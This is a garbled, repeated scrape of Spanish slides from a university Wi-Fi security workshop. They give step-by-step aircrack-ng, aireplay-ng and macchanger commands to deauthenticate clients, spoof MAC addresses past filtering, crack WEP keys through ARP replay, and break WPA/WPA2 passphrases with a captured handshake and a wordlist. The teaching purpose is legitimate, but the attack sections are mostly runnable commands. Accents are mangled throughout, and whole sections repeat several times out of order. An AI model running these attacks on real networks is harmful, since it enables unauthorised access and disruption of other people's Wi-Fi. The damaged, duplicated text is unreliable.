bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
